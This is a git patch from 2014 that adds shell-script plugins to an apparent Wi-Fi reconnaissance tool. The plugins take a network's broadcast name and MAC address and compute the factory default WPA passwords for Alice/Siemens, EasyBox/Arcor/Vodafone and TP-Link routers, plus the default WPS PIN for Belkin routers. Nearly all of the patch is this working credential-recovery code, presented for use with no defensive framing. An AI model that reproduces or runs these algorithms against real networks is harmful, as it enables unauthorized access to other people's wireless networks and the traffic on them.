From c9eb756542891d07b363116569befa80ccda9e55 Mon Sep 17 00:00:00 2001 From: makefu Date: Mon, 22 Dec 2014 20:37:44 +0100 Subject: add belkin wps plugin --- recon/inspect_wifi/plugins/01open | 6 +++++ recon/inspect_wifi/plugins/02alice | 23 ++++++++++++++++++ recon/inspect_wifi/plugins/02easybox | 36 +++++++++++++++++++++++++++++ recon/inspect_wifi/plugins/02tplink | 24 +++++++++++++++++++ recon/inspect_wifi/plugins/11belkin_wps | 30 ++++++++++++++++++++++++ recon/inspect_wifi/plugins/plugin_core | 41 +++++++++++++++++++++++++++++++++ 6 files changed, 160 insertions(+) create mode 100755 recon/inspect_wifi/plugins/01open create mode 100755 recon/inspect_wifi/plugins/02alice create mode 100755 recon/inspect_wifi/plugins/02easybox create mode 100755 recon/inspect_wifi/plugins/02tplink create mode 100755 recon/inspect_wifi/plugins/11belkin_wps create mode 100644 recon/inspect_wifi/plugins/plugin_core (limited to 'recon/inspect_wifi/plugins') diff --git a/recon/inspect_wifi/plugins/01open b/recon/inspect_wifi/plugins/01open new file mode 100755 index 00000000..881f47ea --- /dev/null +++ b/recon/inspect_wifi/plugins/01open @@ -0,0 +1,6 @@ +#!/bin/sh +#ESSID MAC CHANNEL ENCRYPTION +if [ "$4" == "[ESS]" ]; then + exit 0 +fi +exit 1 diff --git a/recon/inspect_wifi/plugins/02alice b/recon/inspect_wifi/plugins/02alice new file mode 100755 index 00000000..f30acc3a --- /dev/null +++ b/recon/inspect_wifi/plugins/02alice @@ -0,0 +1,23 @@ +#!/bin/sh +# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm: +# Based on Poc from +# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html +# +# +# ESSID MAC CHANNEL ENCRYPTION + +cd $(dirname $(readlink -f $0)) +. ./plugin_core + +parse_plugin_args "$@" + +if ! check_vendor_mac $VENDOR_MAC "00255E" ;then + echo "$VENDOR_MAC not affected" + exit 1 +fi + +# printf always makes string to lower, need that for correct md5sum +ETHMAC=$( printf "%012x" $((0x${MAC}-1)) ) +TMP=$(printf $ETHMAC | md5sum) +printf ${TMP:0:12} | base64 +exit 0 diff --git a/recon/inspect_wifi/plugins/02easybox b/recon/inspect_wifi/plugins/02easybox new file mode 100755 index 00000000..58816f25 --- /dev/null +++ b/recon/inspect_wifi/plugins/02easybox @@ -0,0 +1,36 @@ +#!/bin/sh +#ESSID MAC CHANNEL ENCRYPTION WPA WPA2 + +cd $(dirname $(readlink -f $0)) +. ./plugin_core +parse_plugin_args "$@" + +if ! echo "$ESSID" | grep -q '\(EasyBox-\|Arcor-\|Vodafone-\)'; then + echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone" + exit 1 +else + # Fill up to 4 places with zeros, if necessary: + deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g') + # + # The digits M9 to M12 are just the last digits (9.-12.) of the MAC: + hexi=$(echo ${MAC:8:4} | sed 's/./& /g') + #echo 'M4 (Hex): ' ${hexi[@]} + # K1 = last byte of (d0 + d1 + h2 + h3) + # K2 = last byte of (h0 + h1 + d2 + d3) + c1=$(printf "%d + %d + %d + %d" ${deci:0:1} ${deci:2:1} 0x${hexi:4:1} 0x${hexi:6:1}) + c2=$(printf "%d + %d + %d + %d" 0x${hexi:0:1} 0x${hexi:2:1} ${deci:4:1} ${deci:6:1}) + K1=$((($c1)%16)) + K2=$((($c2)%16)) + #printf "K1: %x\n" $K1 + #printf "K2: %x\n" $K2 + X1=$((K1^${deci:6:1})) + X2=$((K1^${deci:4:1})) + X3=$((K1^${deci:2:1})) + Y1=$((K2^0x${hexi:2:1})) + Y2=$((K2^0x${hexi:4:1})) + Y3=$((K2^0x${hexi:6:1})) + Z1=$((0x${hexi:4:1}^${deci:6:1})) + Z2=$((0x${hexi:6:1}^${deci:4:1})) + Z3=$((K1^K2)) + printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F +fi diff --git a/recon/inspect_wifi/plugins/02tplink b/recon/inspect_wifi/plugins/02tplink new file mode 100755 index 00000000..522c0845 --- /dev/null +++ b/recon/inspect_wifi/plugins/02tplink @@ -0,0 +1,24 @@ +#!/bin/sh +# Implementation of TP-Link default WPA Key +# Based on +# http://www.wardriving-forum.de/forum/f321/ezwlan-android-2-1-a-70045-4.html#post342481 + +cd $(dirname $(readlink -f $0)) +. ./plugin_core + +parse_plugin_args "$@" + +if ! check_vendor_mac $VENDOR_MAC F8D111; then + echo "$VENDOR_MAC not affected" + exit 1 +fi + +if echo "$ESSID" | grep -q '^tp'; then + echo "$ESSID not affected" + exit 1 +fi + + +# printf always makes string to lower, need that for correct md5sum +printf "${MAC:4:12}" +exit 0 diff --git a/recon/inspect_wifi/plugins/11belkin_wps b/recon/inspect_wifi/plugins/11belkin_wps new file mode 100755 index 00000000..65448ad0 --- /dev/null +++ b/recon/inspect_wifi/plugins/11belkin_wps @@ -0,0 +1,30 @@ +#!/bin/sh + +cd $(dirname $(readlink -f $0)) +. ./plugin_core +parse_plugin_args "$@" + +if ! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B; then + echo "VENDOR MAC $VENDOR_MAC not affected" + exit 1 +fi + +calc_belkin(){ + PRIVATE_MAC=${1} + p=$((0x$PRIVATE_MAC % 10000000)) + wps_pin_checksum(){ + pin=$1 + accum=0 + while [ $pin -ne 0 ];do + accum=$((accum + (3 * (pin % 10)) )) + pin=$((pin/10)) + accum=$((accum + pin %10 )) + pin=$((pin/10)) + done + echo $(( (10 - accum % 10) % 10)) + } + printf "%07d%d" $p $(wps_pin_checksum $p) + return 0 +} + +printf "WPS-PIN: %s" $(calc_belkin ${PRIVATE_MAC}) diff --git a/recon/inspect_wifi/plugins/plugin_core b/recon/inspect_wifi/plugins/plugin_core new file mode 100644 index 00000000..e79a3c05 --- /dev/null +++ b/recon/inspect_wifi/plugins/plugin_core @@ -0,0 +1,41 @@ +#!/bin/sh +parse_plugin_args(){ + [ $# -ne 4 ] && plugin_usage && exit 1 + # convenience function to put args in ENV variables + ESSID="$1" + + # mac is returned without colon + MAC=$(printf "%s" "$2" | sed 's/://g') + # split up the mac address to vendor and private part + VENDOR_MAC=${MAC:0:6} + PRIVATE_MAC=${MAC:6:12} + CHANNEL="$3" + ENC="$4" + if [ ${#MAC} -ne 12 ] ;then + echo "MAC malformed" + exit 1 + fi +} +plugin_usage(){ + cat << EOF +usage: $0 ESSID MAC CHANNEL ENC" + + ESSID - string + MAC - 00:11:22:33:44:55 + CHANNEL - 4 + ENC - wpa +EOF + +} + +check_vendor_mac(){ + needle="$(printf $1 | tr '[A-Z]' '[a-z]')" + shift + for i in "$@";do + [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0 + done + return 1 +} +check_painmode(){ + test -z "${painmode:-}" && echo "painmode required" && exit 1 +} -- cgit v1.2.3